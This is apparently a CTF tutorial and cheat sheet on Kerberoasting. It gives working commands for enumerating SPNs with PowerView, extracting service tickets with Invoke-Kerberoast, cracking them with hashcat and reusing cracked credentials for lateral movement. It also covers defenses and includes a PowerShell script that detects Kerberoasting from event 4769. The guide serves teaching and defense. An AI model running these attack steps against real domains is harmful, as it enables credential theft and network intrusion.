Active Directory, a cornerstone of many networks, is full of complexity and nuance, and it is those intricacies that give rise to attack techniques like Kerberoasting, which abuses intended protocol behaviour rather than a software bug. This article aims to provide a detailed, hands-on guide to Kerberoasting for Capture The Flag (CTF) enthusiasts. Let it serve as a touchstone during your challenges.
Kerberos and SPNs
Kerberos
The default authentication protocol in Active Directory, Kerberos is ticket-based. A Key Distribution Center (KDC, a role every domain controller holds) issues tickets that vouch for a user's identity, so the password itself never crosses the network: a user first obtains a ticket-granting ticket (TGT), then presents it to obtain a service ticket for each service they want to reach.
Service Principal Names
An SPN uniquely identifies a service instance, for example MSSQLSvc/sql01.corp.local:1433. When a service runs under a domain user account, one or more SPNs are registered on that account, and it is these accounts that Kerberoasting targets. Computer accounts carry SPNs too, but their passwords are long and random, so they are not worth cracking.
Kerberoasting Demystified
Kerberoasting abuses two intended behaviours: any authenticated domain user may request a service ticket (TGS) for any registered SPN, and the KDC encrypts that ticket with the service account's long-term key. For RC4-HMAC (encryption type 23) that key is simply the NT hash of the account's password; for AES (types 17 and 18) it is derived from the password and a salt with PBKDF2, which is far slower to crack. The idea is simple: request the tickets, crack them offline against a wordlist, and recover the plaintext password without ever touching the service or triggering a lockout.
Setting the Stage – Toolkits:
- PowerView: A PowerShell tool to aid in AD enumeration.
- Invoke-Kerberoast: A PowerShell script for extracting Kerberos tickets.
- Hashcat: A potent password cracking tool.
Kerberoasting Cheat Sheet
Enumerate SPNs:
This is your first step. Identify potential service accounts:
# PowerView's way of listing SPNs
Import-Module .\PowerView.ps1
Get-NetUser | Where-Object { $_.serviceprincipalname }
Extract Service Tickets:
# Using Invoke-Kerberoast to get the tickets
Invoke-Kerberoast -OutputFormat Hashcat | Format-List
This yields one hash per account in hashcat's $krb5tgs$ format. Save the Hash property to a file with one entry per line: Format-List wraps long strings when redirected, and Windows PowerShell's Out-File writes UTF-16 by default, both of which hashcat will not read, so write the file with ASCII or UTF-8 encoding.
Cracking the Tickets:
Armed with the ticket hashes, it’s time to bring Hashcat into play:
# Hashcat at work on the Kerberos tickets
hashcat -m 13100 -a 0 ticket_hashes.txt path_to_wordlist/wordlist.txt
-m 13100 selects the hash type (Kerberos 5 TGS-REP etype 23, i.e. RC4-HMAC) and -a 0 a straight wordlist attack. Check the third field of each hash line first: lines beginning $krb5tgs$17$ or $krb5tgs$18$ are AES tickets and need modes 19600 and 19700 respectively; hashcat will not parse them in a 13100 run. Should you have rules for mutating candidate passwords, add them for more thorough cracking attempts.
Advanced Cracking
- Optimized Wordlists: Tools like CeWL can generate custom wordlists from websites (often the company's own site) to capture likely password patterns; the product or host name in the SPN is another good seed.
- Rules in Hashcat: Use rule-based attacks to mutate each wordlist entry, mimicking common password habits (hashcat ships ready-made rule sets in its rules/ directory, such as best64.rule):
hashcat -m 13100 -a 0 -r path_to_rules/rule_file.rule ticket_hashes.txt path_to_wordlist/wordlist.txt
Access and Move
Successful cracking grants you the plaintext password of the service account. Service accounts are frequently over-privileged (local administrator on the hosts they serve, sometimes far more), so use the credential to access resources or as a stepping stone for lateral movement:
# Accessing resources with compromised credentials
net use \\target_IP\share_name /user:domain\serviceaccount_name password
Enhancements and Advanced Tactics
- Automating with CrackMapExec (CME): CME's ldap module requests and dumps the tickets in one command (its --kerberoasting option writes hashcat-ready lines straight to a file), and its other modules let you reuse the cracked credential for further actions.
- Time is of the Essence: the ticket's own lifetime does not matter, because the encrypted blob you extracted can be cracked at any later time; what matters is cracking throughput, so run hashcat on a GPU rather than inside your attack VM. If using cloud-based platforms like AWS for cracking, be wary of costs!
- Defense against the Dark Arts – Understanding Protection Mechanisms: To exploit well, one must know the defenses. Long random passwords for service accounts (ideally group Managed Service Accounts, which rotate automatically), restricting service accounts to AES so that no RC4 tickets are issued, and monitoring Security event 4769 for RC4 (0x17) tickets or for one user requesting tickets for many SPNs in a short time all hinder Kerberoasting. Some defenders also plant a decoy account with an SPN that no legitimate client ever requests, so any ticket for it is an alert.
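The monitoring side of that last point, as an added example that is not from the original page: a small hunt over Security event 4769 that flags RC4 tickets for user-type service accounts and bursts of distinct service tickets from one requester. The events are constructed samples in the XML shape Get-WinEvent's .ToXml() returns, with the real 4769 field names; the account names, times, IPs and the window and threshold values are assumptions.

```powershell
# Added example (not from the original page): hunt for Kerberoasting in Security event 4769.
# Sample events are constructed; field names match the real event. Thresholds are assumptions.

function New-Sample4769 {
    param([string]$Time, [string]$Requester, [string]$Service, [string]$Etype, [string]$Ip)
    # Constructed sample event carrying only the fields this detection needs
    @"
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><EventID>4769</EventID><TimeCreated SystemTime="$Time"/></System><EventData><Data Name="TargetUserName">$Requester</Data><Data Name="ServiceName">$Service</Data><Data Name="TicketEncryptionType">$Etype</Data><Data Name="IpAddress">$Ip</Data></EventData></Event>
"@
}

function ConvertFrom-Event4769 {
    # Turn 4769 event XML (as returned by EventLogRecord.ToXml()) into flat objects
    param([string[]]$EventXml)
    foreach ($x in $EventXml) {
        $e = [xml]$x
        $d = @{}
        foreach ($item in $e.Event.EventData.Data) { $d[$item.GetAttribute('Name')] = $item.'#text' }
        [PSCustomObject]@{
            Time      = [DateTime]$e.Event.System.TimeCreated.SystemTime
            Requester = $d['TargetUserName']          # the account that asked for the ticket
            Service   = $d['ServiceName']             # sAMAccountName of the service account
            Etype     = $d['TicketEncryptionType']    # 0x17 = RC4-HMAC, 0x12 = AES256
            Ip        = $d['IpAddress']
        }
    }
}

function Find-KerberoastIndicator {
    param([object[]]$Events, [int]$WindowMinutes = 5, [int]$ServiceThreshold = 5)
    # Indicator 1: an RC4 (0x17) ticket for a user-type service account. Computer accounts end in $
    # and tickets for krbtgt are TGT renewals, so both are ignored.
    foreach ($ev in $Events) {
        if ($ev.Etype -eq '0x17' -and $ev.Service -notlike '*$' -and $ev.Service -ne 'krbtgt') {
            [PSCustomObject]@{ Indicator = 'RC4 ticket for user SPN'; Requester = $ev.Requester; Detail = $ev.Service; Time = $ev.Time }
        }
    }
    # Indicator 2: one requester pulling tickets for many distinct services inside a short window,
    # the trace a "roast everything" tool leaves whatever the etype.
    foreach ($group in ($Events | Group-Object Requester)) {
        $sorted = @($group.Group | Sort-Object Time)
        for ($i = 0; $i -lt $sorted.Count; $i++) {
            $end = $sorted[$i].Time.AddMinutes($WindowMinutes)
            $services = @($sorted | Where-Object { $_.Time -ge $sorted[$i].Time -and $_.Time -le $end } | ForEach-Object Service | Sort-Object -Unique)
            if ($services.Count -ge $ServiceThreshold) {
                [PSCustomObject]@{ Indicator = 'Service ticket burst'; Requester = $group.Name; Detail = "$($services.Count) services in $WindowMinutes min from $($sorted[$i].Ip)"; Time = $sorted[$i].Time }
                break
            }
        }
    }
}

# Constructed sample log: one user roasting five accounts in four seconds (one of them AES-only),
# plus a second user doing ordinary file-server access and a TGT renewal.
$sample = @(
    New-Sample4769 '2024-05-06T10:00:01Z' 'jsmith@CORP.LOCAL' 'svc_sql'    '0x17' '10.0.0.25'
    New-Sample4769 '2024-05-06T10:00:02Z' 'jsmith@CORP.LOCAL' 'svc_web'    '0x17' '10.0.0.25'
    New-Sample4769 '2024-05-06T10:00:02Z' 'jsmith@CORP.LOCAL' 'svc_backup' '0x17' '10.0.0.25'
    New-Sample4769 '2024-05-06T10:00:03Z' 'jsmith@CORP.LOCAL' 'svc_sccm'   '0x12' '10.0.0.25'
    New-Sample4769 '2024-05-06T10:00:04Z' 'jsmith@CORP.LOCAL' 'svc_report' '0x17' '10.0.0.25'
    New-Sample4769 '2024-05-06T10:03:00Z' 'abrown@CORP.LOCAL' 'FS01$'      '0x12' '10.0.0.40'
    New-Sample4769 '2024-05-06T10:04:00Z' 'abrown@CORP.LOCAL' 'krbtgt'     '0x12' '10.0.0.40'
)

$events = ConvertFrom-Event4769 -EventXml $sample
Find-KerberoastIndicator -Events $events | Format-Table -AutoSize

# On a domain controller, feed real events through the same parser:
# $live = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4769 } -MaxEvents 5000 | ForEach-Object { $_.ToXml() }
# Find-KerberoastIndicator -Events (ConvertFrom-Event4769 -EventXml $live)
```

On the sample, the first rule fires four times (svc_sql, svc_web, svc_backup, svc_report) and misses svc_sccm, which was issued with AES; the burst rule catches jsmith anyway because five distinct services were requested within the window, which is why both indicators are worth keeping. Auditing of Kerberos service ticket operations must be enabled for 4769 to be logged at all, and in a domain where RC4 is still the default the first rule is noisy until service accounts are moved to AES.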
In the Heat of CTF
During a CTF, time, precision, and speed are crucial. Keep these quick references handy:
Service Account Enumeration:
Get-NetUser | Where-Object { $_.serviceprincipalname }
Extracting Tickets:
Invoke-Kerberoast -OutputFormat Hashcat | Format-List
Hashcat Command:
hashcat -m 13100 -a 0 ticket_hashes.txt path_to_wordlist/wordlist.txt
Conclusion
Kerberoasting offers a fascinating insight into the delicate balance between protocol design and real-world security implications. While it’s a potent technique, always remember to act ethically and responsibly. The power of knowledge is best wielded with integrity.